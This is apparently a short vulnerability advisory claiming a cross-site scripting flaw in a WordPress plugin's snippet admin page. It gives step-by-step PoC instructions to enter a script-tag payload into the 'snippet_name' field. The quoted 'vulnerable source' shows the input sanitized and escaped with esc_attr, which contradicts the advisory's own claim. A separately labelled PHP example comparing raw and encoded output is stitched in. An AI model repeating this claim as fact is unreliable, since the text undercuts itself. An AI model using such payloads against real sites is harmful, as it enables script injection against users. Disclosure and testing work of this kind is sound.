[-] Title : WordPress plugin tinymce-advanced 5.3.0 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/tinymce-advanced/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
tinymce-advanced/insert-html-snippet/admin/snippets.php
==============================================================================================
Vulnerable Source:
200: echo esc_attr($search_name);
166: $search_name = sanitize_text_field($_POST['snippet_name']); // if(isset($_POST)),
===============================================================================================
POC :
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

Step 1 = Go to the web page:
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

Step 2 = Locate the input box "snippet_name"
Step 3 = In that input box, add the JavaScript code: <script>alert('XSS')</script>
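
Added example (not part of the original advisory and not the plugin's code): a plain-PHP check of how the test string from the steps above is parsed when a posted "snippet_name" value is echoed back unencoded versus HTML-encoded at output. It assumes the value is reflected as element content; render_raw, render_encoded and inspect are hypothetical names, and htmlspecialchars() stands in for WordPress's escaping helpers.

```php
<?php
// Added example: constructed stand-in code, not taken from the plugin.
// Assumption: the posted value is echoed back into the page as element content.

// "Before": the posted value is reflected with no output encoding.
function render_raw(array $post): string {
    $name = $post['snippet_name'] ?? '';
    return '<p>Search: ' . $name . '</p>';
}

// "After": the value is HTML-encoded at the point of output.
// htmlspecialchars() is plain PHP, used here in place of WordPress's helpers.
function render_encoded(array $post): string {
    $name = $post['snippet_name'] ?? '';
    return '<p>Search: ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Parse the rendered fragment and report what an HTML parser sees:
// the number of <script> elements and the visible text of the body.
function inspect(string $html): array {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // collect parser warnings quietly
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return [
        'scripts' => $doc->getElementsByTagName('script')->length,
        'text'    => $doc->getElementsByTagName('body')->item(0)->textContent,
    ];
}

// Constructed request body carrying the test string from the PoC steps.
$post = ['snippet_name' => "<script>alert('XSS')</script>"];

foreach (['render_raw', 'render_encoded'] as $fn) {
    $r = inspect($fn($post));
    printf("%-15s script elements: %d  text: %s\n", $fn, $r['scripts'], $r['text']);
}
```

A script element count of zero together with the test string appearing verbatim in the text means the reflected value was treated as data, not markup.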
===============================================================================================
************************
* ==> Contact Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************